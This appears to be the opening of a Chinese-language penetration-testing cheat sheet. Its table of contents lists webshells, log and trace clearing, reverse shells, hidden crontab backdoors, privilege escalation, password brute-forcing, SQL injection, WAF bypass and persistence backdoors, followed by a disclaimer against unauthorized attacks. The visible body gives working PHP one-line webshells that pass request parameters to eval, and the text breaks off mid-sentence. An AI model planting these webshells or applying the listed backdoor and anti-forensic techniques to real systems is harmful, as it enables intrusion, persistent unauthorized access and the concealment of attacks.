目录

windows

php一句话木马

日志清理

DOS命令

查看用户的SID

最高权限

常见的cmd命令

反弹shell

PHPMYadmin

mysql注入语句

wmic

linux

crontab创建隐藏后门

linux日志文件

knockd服务

ssh登录

ssh隧道

本地转发

远程转发

动态转发

/proc：

Centos 8 更新 yum 源

痕迹清理技巧

隐身ssh登录系统

docker

设置仓库

Docker 更换国内镜像源

密码信息

内核提权

查看发行版

查看内核版本

一句话添加用户

获取临时shell

设置受限制shell

绕过受限的shell

可提权文件

辅助提权工具

git提权

清理磁盘

df

du

查看可执行的命令

系统信息

查看系统是32位还是64位

查看内核信息

查看开机启动

计划任务

特殊权限

环境变量

查看ssh日志信息

查找特殊权限账号（默认root）

查找可以登录ssh的账号

查看正在连接的ssh sessions

抓包

teehee提权

find

提权

按权限查找

按所有者查找

按时间查找

按大小查找文件

grep

mysql暴力破解

查看登录错误的用户名

查看登录错误用户名及ip登录次数

kali

crunch

john破解zip加密文件

nmap

常用

脚本扫描

hydra

ssh:22

Ftp:21

https

smb

rdp:3389

pop3

sqlmap

Access注入

MySQL数据库注入

Cookie注入

POST表单注入

绕过WAF防火墙

meterpreter

端口转发

设置监听

乱码

常用基本系统命令

文件命令

获取系统信息

用户界面

权限

hashdump

利用

内网渗透

维持访问（种植后门）

第三种shift后门

常用

msf

msfvenom

WMAP(轻量级测试工具,检测常见的Web漏洞)

NDProxy内核提权

---

免责声明

文章仅做经验分享用途，切勿当真，未授权的攻击属于非法行为！利用本文章所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担任何责任，一旦造成后果请自行承担！！！

windows

php一句话木马

<?php eval(@$_POST['a']);?>
<?php eval(@$_GET['a']);?>
其中eval